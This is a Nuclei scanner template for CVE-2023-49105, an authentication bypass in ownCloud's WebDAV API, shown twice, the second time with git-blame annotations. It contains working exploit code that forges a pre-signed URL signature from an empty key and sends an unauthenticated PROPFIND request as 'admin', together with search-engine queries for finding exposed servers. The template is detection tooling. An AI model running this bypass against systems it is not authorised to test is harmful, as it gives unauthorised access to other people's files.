nuclei-templates/code/cves/2023/CVE-2023-49105.yaml

id: CVE-2023-49105

info:
  name: OwnCloud - WebDAV API Authentication Bypass
  author: ChristianPoeschl,FlorianDewald,usdAG
  severity: critical
  description: |
    An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
  reference:
    - https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/
    - https://github.com/0xfed/ownedcloud
    - https://owncloud.org/security
    - https://github.com/ambionics/owncloud-exploits
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-49105
    cwe-id: CWE-287
    epss-score: 0.18166
    epss-percentile: 0.96172
    cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: owncloud
    product: owncloud
    shodan-query:
      - title:"owncloud"
      - http.title:"owncloud"
    fofa-query: title="owncloud"
    google-query: intitle:"owncloud"
  tags: cve,cve2023,code,owncloud,auth-bypass
variables:
  username: admin

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei
    source: |
      # build signature for presigned urls
      import base64, hashlib, datetime, os
      from urllib.parse import urlencode

      username = os.getenv('username')
      base_url = os.getenv('BaseURL')
      dav_url = f'{base_url}/remote.php/dav/files/{username}'
      oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')
      data = {
        'OC-Expires': '991200',
        'OC-Verb': 'PROPFIND',
        'OC-Credential': username,
        'OC-Date': oc_date
      }
      sig_url = f'{dav_url}?{urlencode(data)}'
      # derive signature from empty sign key
      dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)
      final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'
      #final_url = f'{sig_url}&OC-Signature={dk.hex()}'
      print(final_url)

http:
  - raw:
      - |
        PROPFIND {{code_response}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Authorization: Basic {{base64('{{username}}')}}

    matchers-condition: or
    matchers:
      - type: dsl
        name: bypass-correct-user
        dsl:
          - status_code == 207
          - contains(body, 'owncloud.org')
        condition: and

      - type: word
        name: bypass-wrong-user
        part: body
        words:
          - User unknown
          - Sabre
          - Exception
          - NotAuthenticated
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"Username => "+ username'
# digest: 4a0a00473045022100cd75893be6bdbdd291261de98eaaf9655419b306536c647069f97bc6b71ddbe2022029ba873b1e50b5a01e59c18aaa95b53a8217ef58ccec9e655b60d8dfc63259eb:922c64590222798bb761d5b6d8e72950
CVE-2023-49105 (#8835) * Create cve-2023-49105.yaml * Update cve-2023-49105.yaml 2023-12-15 13:48:22 +00:00			`id: CVE-2023-49105`

			`info:`
			`name: OwnCloud - WebDAV API Authentication Bypass`
			`author: ChristianPoeschl,FlorianDewald,usdAG`
			`severity: critical`
			`description: \|`
			`An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.`
			`reference:`
			`- https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/`
			`- https://github.com/0xfed/ownedcloud`
			`- https://owncloud.org/security`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`- https://github.com/ambionics/owncloud-exploits`
			`- https://github.com/nomi-sec/PoC-in-GitHub`
CVE-2023-49105 (#8835) * Create cve-2023-49105.yaml * Update cve-2023-49105.yaml 2023-12-15 13:48:22 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2023-49105`
			`cwe-id: CWE-287`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`epss-score: 0.18166`
			`epss-percentile: 0.96172`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`cpe: cpe:2.3:a:owncloud:owncloud::::::::`
CVE-2023-49105 (#8835) * Create cve-2023-49105.yaml * Update cve-2023-49105.yaml 2023-12-15 13:48:22 +00:00			`metadata:`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`max-request: 2`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`vendor: owncloud`
CVE-2023-49105 (#8835) * Create cve-2023-49105.yaml * Update cve-2023-49105.yaml 2023-12-15 13:48:22 +00:00			`product: owncloud`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- title:"owncloud"`
			`- http.title:"owncloud"`
			`fofa-query: title="owncloud"`
			`google-query: intitle:"owncloud"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve,cve2023,code,owncloud,auth-bypass`
CVE-2023-49105 (#8835) * Create cve-2023-49105.yaml * Update cve-2023-49105.yaml 2023-12-15 13:48:22 +00:00			`variables:`
			`username: admin`

			`code:`
			`- engine:`
			`- py`
			`- python3 # requires python to be pre-installed on system running nuclei`
			`source: \|`
			`# build signature for presigned urls`
			`import base64, hashlib, datetime, os`
			`from urllib.parse import urlencode`

			`username = os.getenv('username')`
			`base_url = os.getenv('BaseURL')`
			`dav_url = f'{base_url}/remote.php/dav/files/{username}'`
			`oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')`
			`data = {`
			`'OC-Expires': '991200',`
			`'OC-Verb': 'PROPFIND',`
			`'OC-Credential': username,`
			`'OC-Date': oc_date`
			`}`
			`sig_url = f'{dav_url}?{urlencode(data)}'`
			`# derive signature from empty sign key`
			`dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)`
			`final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'`
			`#final_url = f'{sig_url}&OC-Signature={dk.hex()}'`
			`print(final_url)`

			`http:`
			`- raw:`
			`- \|`
			`PROPFIND {{code_response}} HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: text/xml`
			`Authorization: Basic {{base64('{{username}}')}}`

			`matchers-condition: or`
			`matchers:`
			`- type: dsl`
			`name: bypass-correct-user`
			`dsl:`
			`- status_code == 207`
			`- contains(body, 'owncloud.org')`
			`condition: and`

			`- type: word`
			`name: bypass-wrong-user`
			`part: body`
			`words:`
			`- User unknown`
			`- Sabre`
			`- Exception`
			`- NotAuthenticated`
			`condition: and`

			`extractors:`
			`- type: dsl`
			`dsl:`
			`- '"Username => "+ username'`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a00473045022100cd75893be6bdbdd291261de98eaaf9655419b306536c647069f97bc6b71ddbe2022029ba873b1e50b5a01e59c18aaa95b53a8217ef58ccec9e655b60d8dfc63259eb:922c64590222798bb761d5b6d8e72950`